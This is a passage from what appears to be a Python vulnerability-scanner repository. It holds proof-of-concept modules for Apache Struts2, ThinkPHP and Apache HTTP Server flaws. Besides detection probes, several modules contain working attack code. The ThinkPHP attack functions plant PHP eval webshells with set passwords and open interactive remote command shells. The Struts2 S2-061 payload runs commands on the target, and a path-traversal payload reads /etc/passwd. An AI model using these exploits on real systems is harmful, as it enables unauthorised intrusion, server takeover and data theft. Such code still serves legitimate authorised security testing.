r'?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd={0}' 15 | payload1 = payload.format(cmd_shell) 16 | payload2 = payload.format(flag) 17 | vulurl1 = urllib.parse.urljoin(url, payload1) 18 | vulurl2 = urllib.parse.urljoin(url, payload2) 19 | req1 = requests.get(vulurl1, timeout=3) 20 | req2 = requests.get(vulurl2, timeout=3) 21 | if re.search(flag, req1.text): 22 | if re.search(flag, req2.text) and len(req2.text) < len(req1.text): 23 | pass 24 | else: 25 | relsult['vulnerable'] = True 26 | relsult['method'] = 'GET' 27 | relsult['url'] = url 28 | relsult['payload'] = vulurl1 29 | return relsult 30 | except: 31 | return relsult 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_045.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-045 Remote Code Execution Vulnerablity(CVE-2017-5638)', 9 | 'vulnerable': False 10 | } 11 | try: 12 | headers_payload = { 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 14 | 'Content-Type': r'''"%{# context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('abcd',4321*1234)}.multipart/form-data"''' 15 | } 16 | req = requests.post(url, headers=headers_payload, timeout=3) 17 | if req.headers['abcd'] == '5332114': 18 | relsult['vulnerable'] = True 19 | relsult['method'] = 
'POST' 20 | relsult['url'] = url 21 | relsult['position'] = 'Content-Type' 22 | relsult['payload'] = headers_payload 23 | return relsult 24 | except: 25 | return relsult 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_046.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import requests 3 | import re 4 | from urllib.parse import urlparse 5 | 6 | q = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2 7 | Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',4982935*2545583)}\x00b" 8 | Content-Type: text/plain 9 | 10 | foo 11 | ------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\n', b'\r\n') 12 | p = b'''POST / HTTP/1.1 13 | Host: localhost:8080 14 | Upgrade-Insecure-Requests: 1 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 16 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 17 | Accept-Language: en-US,en;q=0.8,es;q=0.6 18 | Connection: close 19 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2 20 | Content-Length: %d 21 | 22 | '''.replace(b'\n', b'\r\n') % (len(q),) 23 | def verify(url): 24 | relsult = { 25 | 'name': 'S2-046 Remote Code Execution Vulnerablity(CVE-2017-5638)', 26 | 'vulnerable': False 27 | } 28 | try: 29 | oH = urlparse(url) 30 | a = oH.netloc.split(':') 31 | port = 80 32 | if 2 == len(a): 33 | port = a[1] 34 | elif 'https' in oH.scheme: 35 | port = 443 36 | host = a[0] 37 | with socket.create_connection((host, port), timeout=5) as conn: 38 | conn.send(p + q) 39 | req = conn.recv(10240).decode() 40 | if re.search('12684474626105', req): 41 | relsult['vulnerable'] = True 42 | relsult['method'] = 'POST' 43 | relsult['url'] = url 44 | relsult['position'] = 'filename' 45 
# ---- tail of /pocs/framework/struct2/s2_046.py: verify() begins on the previous line of this listing ----
            # NOTE(review): the payload recorded here (42935*2283) is not the one
            # the socket probe actually sent (4982935*2545583, whose product
            # 12684474626105 is what the response is checked for), so the
            # recorded evidence does not match the request that produced it.
            relsult['payload'] = r'''Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',42935*2283)}\x00b"'''
        return relsult
    except:  # bare except: any socket or decode error reads as "not vulnerable"
        return relsult


# /pocs/framework/struct2/s2_048.py
import requests
import re  # unused in this module
import urllib


def verify(url):
    """Probe *url* for S2-048 with an arithmetic OGNL expression in a form field.

    Posts ``name=${1234*58614}&age=${233*233}`` (URL-encoded) to the
    root-relative path ``/integration/saveGangster.action``; the leading
    slash makes ``urljoin`` discard any path in *url*.  A body containing
    ``72329676`` (== 1234*58614) marks the target as vulnerable; the second
    product is not checked.  No command is executed on the host.

    Args:
        url: base URL of the target.

    Returns:
        A result dict; on a hit ``method``, ``url``, ``position`` and
        ``payload`` are added.  Any exception returns the unchanged dict.
        TLS verification is left at the requests default here.
    """
    relsult = {
        'name': 'S2-048 Remote Code Execution Vulnerablity',
        'vulnerable': False
    }
    try:
        vulurl = urllib.parse.urljoin(url, '/integration/saveGangster.action')
        payload = r'''name=%24%7B1234*58614%7D&age=%24%7B233*233%7D&__checkbox_bustedBefore=true'''
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        req = requests.post(vulurl, headers=headers, timeout=3, data=payload)
        if '72329676' in req.text:
            relsult['vulnerable'] = True
            relsult['method'] = 'POST'
            relsult['url'] = vulurl
            relsult['position'] = 'data'
            relsult['payload'] = payload
        return relsult
    except:
        return relsult


# /pocs/framework/struct2/s2_053.py
import requests
import re  # unused in this module
import urllib


def verify(url):
    """Probe *url* for S2-053 with an arithmetic expression in ``redirectUri``.

    Posts ``redirectUri=%{526154872*12396111}`` (URL-encoded) to *url*
    itself.  The expected marker ``1285306632`` is the product reduced
    modulo 2**32, i.e. the wrapped Java ``int`` result, not the full
    mathematical product.  Side-effect-free on the host.

    Args:
        url: the endpoint that renders ``redirectUri``.

    Returns:
        A result dict; on a hit ``method``, ``url``, ``position``,
        ``payload`` and ``about`` are added.  Any exception returns the
        unchanged dict.
    """
    relsult = {
        'name': 'S2-053 Remote Code Execution Vulnerablity',
        'vulnerable': False
    }
    try:
        payload = r'''redirectUri=%25%7B526154872*12396111%7D'''
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        req = requests.post(url, headers=headers, timeout=3, data=payload)
        if '1285306632' in req.text:  # 526154872*12396111 wrapped to 32-bit
            relsult['vulnerable'] = True
            relsult['method'] = 'POST'
            relsult['url'] = url
            relsult['position'] = 'data'
            relsult['payload'] = payload
            relsult['about'] = 'https://github.com/vulhub/vulhub/blob/master/struts2/s2-053/README.zh-cn.md'
        return relsult
    except:
        return relsult



# /pocs/framework/struct2/s2_057.py
import requests
import re
import urllib


def verify(url):
    """Probe *url* for S2-057 via an arithmetic expression in the namespace segment.

    Two GETs are sent, ``${9437*2453}/actionChain1.action`` and
    ``${233*233}/actionChain1.action``; the target is flagged only when the
    first response contains ``23148961`` and the second ``54289``.  Requiring
    two distinct products guards against a page that merely echoes the
    request back.  Side-effect-free on the host.

    Args:
        url: base URL.  Both probes are relative paths, so ``urljoin``
            replaces the last path segment of *url* unless it ends with
            ``/`` -- a base like ``http://host/app`` is probed at
            ``http://host/${...}/actionChain1.action``.

    Returns:
        A result dict; on a hit ``method``, ``url``, ``payload`` (the first
        probe URL) and ``about`` are added.  Any exception returns the
        unchanged dict.
    """
    relsult = {
        'name': 'S2-057 远程代码执行漏洞',
        'vulnerable': False
    }
    try:
        vurl1 = urllib.parse.urljoin(url, '$%7B9437*2453%7D/actionChain1.action')  # 9437*2453 == 23148961
        vurl2 = urllib.parse.urljoin(url, '$%7B233*233%7D/actionChain1.action')  # 233*233 == 54289
        req1 = requests.get(vurl1, timeout=3)
        req2 = requests.get(vurl2, timeout=3)
        if re.search('23148961', req1.text) and re.search('54289', req2.text):
            relsult['vulnerable'] = True
            relsult['method'] = 'GET'
            relsult['url'] = url
            relsult['payload'] = vurl1
            relsult['about'] = 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-057'
        return relsult
    except:
        return relsult



# /pocs/framework/struct2/s2_061.py
import requests,re
import urllib
import urllib.parse as urlparse  # alias not used in the part of the module shown here


def verify(url):
    # Unlike the arithmetic probes above, this check executes a command on
    # the target ('id') and looks for its output; it is not side-effect-free.
    relsult = {
        'name': 'Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)',
        'vulnerable': False
    }
    cmd = 'id'
    payload =  # the URL-encoded OGNL literal continues on the next line of this listing
"%25%7b(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27" + cmd + "%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d" 13 | ps = ['id', 'pid', 'name', 'uid', 'm', 'a'] 14 | try: 15 | for p in ps: 16 | payload = "/?{0}=".format(p) + payload 17 | vurl = urllib.parse.urljoin(url, payload) 18 | req = requests.get(vurl, timeout=3) 19 | if re.search(r'uid=.+ gid=.+ groups=.+', req.text): 20 | relsult['vulnerable'] = True 21 | relsult['url'] = url 22 | relsult['payload'] = vurl 23 | relsult['about'] = 'https://blog.csdn.net/qq_36197704/article/details/111226322' 24 | return relsult 25 | return relsult 26 | except: 27 | return relsult 28 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp2_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Thinkphp 2.x rce', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | } 11 | try: 12 | payload = urllib.parse.urljoin(url, '/index.php?s=a/b/c/${var_dump(md5(1))}') 13 | response = requests.get(payload, timeout=3) 14 | if re.search(r'c4ca4238a0b923820dcc509a6f75849b', response.text): 15 | relsult['vulnerable'] = True 16 | relsult['method'] = 'GET' 17 | relsult['url'] = 
url 18 | relsult['payload'] = payload 19 | relsult['attack'] = True 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | # getshell 25 | def attack(url): 26 | try: 27 | print('[*] 存在 Thinkphp 2.x rce!') 28 | payload = r'/index.php?s=a/b/c/${@print(eval($_POST[hk]))}' 29 | webshell = urllib.parse.urljoin(url, payload) 30 | if requests.get(webshell, timeout=10).status_code == 200: 31 | print('[+] webshell:', webshell) 32 | print('[+] 密码: hk') 33 | return True 34 | else: 35 | return False 36 | except: 37 | return False 38 | 39 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp32x_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, socket 3 | import urllib 4 | from urllib.parse import urlparse 5 | from datetime import date, timedelta 6 | 7 | def verify(url): 8 | relsult = { 9 | 'name': 'ThinkPHP3.2.x 远程代码执行', 10 | 'vulnerable': False, 11 | 'attack': True, 12 | } 13 | payload1 = b''' 14 | GET /index.php?m=--> HTTP/1.1 15 | Host: localhost:8080 16 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 17 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 18 | Accept-Language: en-GB,en;q=0.5 19 | Accept-Encoding: gzip, deflate 20 | Connection: close 21 | Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66; 22 | Upgrade-Insecure-Requests: 1 23 | 24 | '''.replace(b'\n', b'\r\n') 25 | try: 26 | oH = urlparse(url) 27 | a = oH.netloc.split(':') 28 | port = 80 29 | if 2 == len(a): 30 | port = a[1] 31 | elif 'https' in oH.scheme: 32 | port = 443 33 | host = a[0] 34 | with socket.create_connection((host, port), timeout=5) as conn: 35 | conn.send(payload1) 36 | req1 = conn.recv(10240).decode() 37 | today = (date.today() + timedelta()).strftime("%y_%m_%d") 38 | payload2 = urllib.parse.urljoin(url, 
'index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/{0}.log'.format(today)) 39 | req2 = requests.get(payload2, timeout=3) 40 | if re.search(r'c4ca4238a0b923820dcc509a6f75849b', req2.text): 41 | relsult['vulnerable'] = True 42 | relsult['method'] = 'GET' 43 | relsult['url'] = url 44 | relsult['payload'] = payload2 45 | relsult['about'] = 'https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ,https://www.seebug.org/vuldb/ssvid-99297' 46 | return relsult 47 | except: 48 | return relsult 49 | 50 | 51 | def attack(url): 52 | payload1 = b'''GET /index.php?m=--> HTTP/1.1 53 | Host: localhost:8080 54 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 55 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 56 | Accept-Language: en-GB,en;q=0.5 57 | Accept-Encoding: gzip, deflate 58 | Connection: close 59 | Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66; 60 | Upgrade-Insecure-Requests: 1 61 | 62 | '''.replace(b'\n', b'\r\n') 63 | try: 64 | oH = urlparse(url) 65 | a = oH.netloc.split(':') 66 | port = 80 67 | if 2 == len(a): 68 | port = a[1] 69 | elif 'https' in oH.scheme: 70 | port = 443 71 | host = a[0] 72 | print('[+] 正在上传webshell.................') 73 | with socket.create_connection((host, port), timeout=5) as conn: 74 | conn.send(payload1) 75 | req1 = conn.recv(10240).decode() 76 | today = (date.today() + timedelta()).strftime("%y_%m_%d") 77 | payload2 = urllib.parse.urljoin(url, 'index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/{0}.log'.format(today)) 78 | req2 = requests.get(payload2, timeout=3) 79 | if req2.status_code == 200: 80 | print('[*] webshell上传成功!') 81 | print('[*] Webshell地址: {0}'.format(payload2)) 82 | print('[*] 密码: a') 83 | print('[+] have a good day!') 84 | return True 85 | else: 86 | print('[-] webshell上传失败请检查是否存在漏洞?') 87 | return False 88 | except: 89 | return False 90 | 91 | 
-------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp5022_5129.py: --------------------------------------------------------------------------------
import requests
import re
import urllib
# NOTE(review): `import urllib` alone does not import the `urllib.parse` submodule;
# the calls below only work because `requests` happens to load it first.


def verify(url):
    """Check whether `url` runs a ThinkPHP build exposed to the invokefunction RCE.

    A single GET asks the app to call md5("1") through `\\think\\app/invokefunction`;
    the response is then searched for the md5 of "1". Returns the result dict in every
    path (also on any exception), with `vulnerable` set only on a positive match.
    Defender note: the `s=...invokefunction&function=call_user_func_array` query string
    is a stable request-level signature for WAF/IDS rules.
    """
    relsult = {
        'name': 'Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability',
        'vulnerable': False,
        'attack': True,
    }
    try:
        payload = urllib.parse.urljoin(url, r'''/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=1''')
        # verify=False disables TLS certificate checking for this probe.
        response = requests.get(payload, timeout=3, verify=False)
        # c4ca4238a0b923820dcc509a6f75849b is md5("1"); its presence means the
        # server evaluated the injected call.
        if re.search(r'c4ca4238a0b923820dcc509a6f75849b', response.text):
            relsult['vulnerable'] = True
            relsult['method'] = 'GET'
            relsult['url'] = url
            relsult['payload'] = payload
            relsult['attack'] = True  # already True from the initialiser; kept for parity with other pocs
        return relsult
    except:  # bare except also swallows KeyboardInterrupt; errors are reported as "not vulnerable"
        return relsult

# getshell
def attack(url):
    """Interactive follow-up for a positive verify(); returns True after the loop, False otherwise.

    NOTE(review): `if verify(url)` is always true, because verify() returns a non-empty
    dict in every path; the intended test is `verify(url)['vulnerable']`. As written the
    loop starts even when the target is not vulnerable.
    """
    basic_payload = url + r'''/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]='''
    if verify(url):
        print('[+] 存在 Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability')
        print('[+] 开始执行命令, 输入exit推出')
        cmd_shell = ''
        while cmd_shell != 'exit':
            cmd_shell = str(input('[+] 执行命令:'))
            # user input is appended to the URL as-is (no URL encoding)
            payload = basic_payload + cmd_shell
            response = requests.get(payload, verify=False, timeout=3)
            print('[*] 执行结果:\n', response.text)
        return True
    else:
        return False
-------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp5023_rce.py: --------------------------------------------------------------------------------
import requests
import re
import urllib
# NOTE(review): as in the sibling poc, `urllib.parse` is used without being imported explicitly.


def verify(url):
    """Check whether `url` runs ThinkPHP 5.0.23 with the `_method=__construct` filter override.

    Two POSTs go to `/index.php?s=captcha`: one with the override body, one without.
    The target is flagged only if "PHP Version" appears in the first response and
    NOT in the second, which filters out pages that legitimately display phpinfo.
    Returns the result dict in every path, including on exceptions.
    Defender note: a POST body containing `_method=__construct` together with
    `filter[]=` is the request-level signature to alert on.
    """
    relsult = {
        'name': 'ThinkPHP5 5.0.23 Remote Code Execution Vulnerability',
        'vulnerable': False,
        'attack': True,
    }
    try:
        target = url + '/index.php?s=captcha'  # dead assignment: overwritten on the next line
        target = urllib.parse.urljoin(url, '/index.php?s=captcha')
        payload = r'_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        # verify=False disables TLS certificate checking for both probes.
        response = requests.post(target, data=payload, timeout=3, verify=False, headers=headers)
        # control request without a body, used as the baseline for the differential check
        response2 = requests.post(target, timeout=3, verify=False, headers=headers)
        if re.search(r'PHP Version', response.text) and not re.search(r'PHP Version', response2.text):
            relsult['vulnerable'] = True
            relsult['method'] = 'POST'
            relsult['url'] = target
            relsult['position'] = 'data'
            relsult['payload'] = payload
            relsult['attack'] = True  # already True from the initialiser
        return relsult
    except:  # bare except: network/timeout errors are reported as "not vulnerable"
        return relsult

# getshell
def attack(url):
    """Interactive follow-up for a positive verify(); returns True after the loop, False otherwise.

    NOTE(review): same defect as the sibling poc — `if verify(url)` is always true because
    verify() returns a non-empty dict; `verify(url)['vulnerable']` is the intended test.
    """
    if verify(url):
        print('[+] 存在 ThinkPHP5 5.0.23 Remote Code Execution Vulnerability')
        target = url + '/index.php?s=captcha'  # plain concatenation here, unlike urljoin() in verify()
        basic_payload = '_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]={0}'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        cmd_shell = ''
        print('[+] 开始执行命令, 输入exit退出')
        while cmd_shell != 'exit':
            cmd_shell = str(input('[+] 执行命令: '))
            payload = basic_payload.format(cmd_shell)
            response = requests.post(target, data=payload, headers=headers, timeout=3, verify=False)
            # `output` is never used; the pattern may also have lost characters when the page
            # was extracted (angle brackets are missing elsewhere in this dump) — TODO confirm
            output = re.search(r'([^<]*)', response.text)[0]
            print('[*] 执行结果结果:', response.text)
        return True
    else:
        return False
-------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp5_sqli.py: --------------------------------------------------------------------------------
import requests
import re
3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure Vulnerability', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload = urllib.parse.urljoin(url, '/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1') 12 | response = requests.get(payload, timeout=3, verify=False) 13 | if re.search(r'XPATH syntax error', response.text): 14 | relsult['vulnerable'] = True 15 | relsult['method'] = 'GET' 16 | relsult['url'] = url 17 | relsult['payload'] = payload 18 | return relsult 19 | except: 20 | return relsult 21 | 22 | # 只能爆出用户名密码(不能子查询) 23 | def exp(): 24 | url = input('输入目标URL:') 25 | if verify(url): 26 | print('[+] 存在 ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure Vulnerability') 27 | payload = url + r'/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1' 28 | response = requests.get(payload, timeout=3, verify=False) 29 | user = re.findall(r"XPATH syntax error: '
\n([^']*)'", response.text)[0] 30 | print('[+] 数据库用户:', user) 31 | 32 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp_driver_display_rce.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import requests 3 | 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'thinkphp_driver_display_rce', 8 | 'vulnerable': False 9 | } 10 | headers = { 11 | "User-Agent" : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 12 | } 13 | try: 14 | vurl = urllib.parse.urljoin(url, 'index.php?s=index/\\think\\view\driver\Php/display&content=%3C?php%20var_dump(md5(2333));?%3E') 15 | req = requests.get(vurl, headers=headers, timeout=15, verify=False) 16 | if r"56540676a129760a" in req.text: 17 | relsult['vulnerable'] = True 18 | relsult['url'] = url 19 | relsult['method'] = 'GET' 20 | relsult['payload'] = vurl 21 | return relsult 22 | except: 23 | return relsult -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp_index_construct_rce.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import requests 3 | 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'thinkphp_index_construct_rce', 8 | 'vulnerable': False 9 | } 10 | headers = { 11 | "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 12 | "Content-Type": "application/x-www-form-urlencoded", 13 | } 14 | payload = 's=4e5e5d7364f443e28fbf0d3ae744a59a&_method=__construct&method&filter[]=var_dump' 15 | try: 16 | vurl = urllib.parse.urljoin(url, 'index.php?s=index/index/index') 17 | req = requests.post(vurl, data=payload, headers=headers, timeout=15, verify=False) 18 | if r"4e5e5d7364f443e28fbf0d3ae744a59a" in req.text and 'var_dump' not in req.text: 19 | relsult['vulnerable'] = True 20 | relsult['method'] = 'POST' 21 | 
relsult['url'] = vurl 22 | relsult['position'] = 'data' 23 | relsult['payload'] = payload 24 | return relsult 25 | except: 26 | return relsult 27 | 28 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp_index_showid_rce.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import datetime 3 | import requests 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'thinkphp_index_showid_rce', 9 | 'vulnerable': False 10 | } 11 | headers = { 12 | "User-Agent" : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 13 | } 14 | try: 15 | vurl = urllib.parse.urljoin(url, 'index.php?s=my-show-id-\\x5C..\\x5CTpl\\x5C8edy\\x5CHome\\x5Cmy_1{~var_dump(md5(2333))}]') 16 | req = requests.get(vurl, headers=headers, timeout=15, verify=False) 17 | timenow = datetime.datetime.now().strftime("%Y_%m_%d")[2:] 18 | vurl2 = urllib.parse.urljoin(url, 'index.php?s=my-show-id-\\x5C..\\x5CRuntime\\x5CLogs\\x5C{0}.log'.format(timenow)) 19 | req2 = requests.get(vurl2, headers=headers, timeout=15, verify=False) 20 | if r"56540676a129760a3" in req2.text: 21 | relsult['vulnerable'] = True 22 | relsult['method'] = 'GET' 23 | relsult['url'] = vurl 24 | relsult['payload'] = vurl2 25 | return relsult 26 | except: 27 | return relsult 28 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp_invoke_func_code_exec.py: -------------------------------------------------------------------------------- 1 | import re 2 | import urllib 3 | import requests 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'thinkphp_invoke_func_code_exec', 9 | 'vulnerable': False 10 | } 11 | headers = { 12 | "User-Agent" : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 13 | } 14 | controllers = list() 15 | try: 16 | req = requests.get(url, headers=headers, timeout=15, verify=False) 
17 | except: 18 | return relsult 19 | pattern = ' 25 | 26 | -----------------------------153388130435749919031880185481 27 | Content-Disposition: form-data; name="name" 28 | 29 | testing.php 30 | 31 | -----------------------------153388130435749919031880185481--''' 32 | 33 | try: 34 | respond = requests.post(url, headers=headers,data=data, timeout=3) 35 | v = requests.get(url + filename, timeout=3) 36 | if respond.status_code == 200 and re.search('PHP Version', v.text) and v.status_code == 200: 37 | relsult['vulnerable'] = True 38 | relsult['url'] = url 39 | relsult['verify'] = url + filename 40 | relsult['about'] = 'https://www.cnblogs.com/confidant/p/15460396.html, https://vulhub.org/#/environments/httpd/CVE-2017-15715/' 41 | return relsult 42 | else: 43 | return relsult 44 | except: 45 | return relsult 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /pocs/middleware/apache/CVE_2021_41773.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | import urllib.request 5 | import ssl 6 | from colorama import init 7 | 8 | def verify(url): 9 | relsult = { 10 | 'name': 'Apache HTTP Server Arbitrary File Read(CVE-2021-41773)', 11 | 'vulnerable': False 12 | } 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36', 15 | } 16 | 17 | payload = '/cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd' 18 | # 防止ssl报错 19 | context = ssl._create_unverified_context() 20 | vurl = urllib.parse.urljoin(url, payload) 21 | try: 22 | re = urllib.request.Request(url=vurl, headers=headers) 23 | response = urllib.request.urlopen(re, context=context, timeout=3) 24 | response = response.read().decode('utf-8') 25 | if "root:x:" in str(response): 26 | relsult['vulnerable'] = True 27 | relsult['url'] = url 28 | relsult['vulurl'] = vurl 29 | relsult['about'] = 
'https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013' 30 | return relsult 31 | else: 32 | return relsult 33 | except: 34 | return relsult 35 | 36 | 37 | -------------------------------------------------------------------------------- /pocs/middleware/apache/CVE_2021_42013.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | from urllib import request 5 | import time 6 | import socket 7 | from urllib.parse import urlparse 8 | 9 | def verify(url): 10 | relsult = { 11 | 'name': ' Apache HTTP Server 2.4.50 远程代码执行漏洞(CVE-2021-42013)', 12 | 'vulnerable': False, 13 | 'attack': True, 14 | } 15 | 16 | cmd = 'echo 9304c2d1af7a21f56830c7ba773a93e2 | base64' 17 | 18 | # 防止ssl报错 19 | p = b''' 20 | POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1 21 | Host: localhost:8080 22 | Accept-Encoding: identity 23 | Content-Type: application/text 24 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 25 | Content-Length: 51 26 | 27 | '''.replace(b'\n', b'\r\n') 28 | payload = 'echo;{0}\n'.format(cmd) 29 | payload = bytes(payload, 'utf-8') 30 | payload = payload.replace(b'\n', b'\r\n') 31 | 32 | try: 33 | oH = urlparse(url) 34 | a = oH.netloc.split(':') 35 | port = 80 36 | if 2 == len(a): 37 | port = a[1] 38 | elif 'https' in oH.scheme: 39 | port = 443 40 | host = a[0] 41 | with socket.create_connection((host, port), timeout=5) as conn: 42 | conn.send(p + payload) 43 | time.sleep(2) 44 | rep = conn.recv(10240).decode() 45 | if re.search("OTMwNGMyZDFhZjdhMjFmNTY4MzBjN2JhNzczYTkzZTIK", rep): 46 | relsult['vulnerable'] = True 47 | relsult['url'] = url 48 | relsult['about'] = 'https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013' 49 | return relsult 50 | else: 51 | return relsult 52 | except: 53 | return relsult 54 | 55 | def attack(url): 56 | try: 57 | payload = 
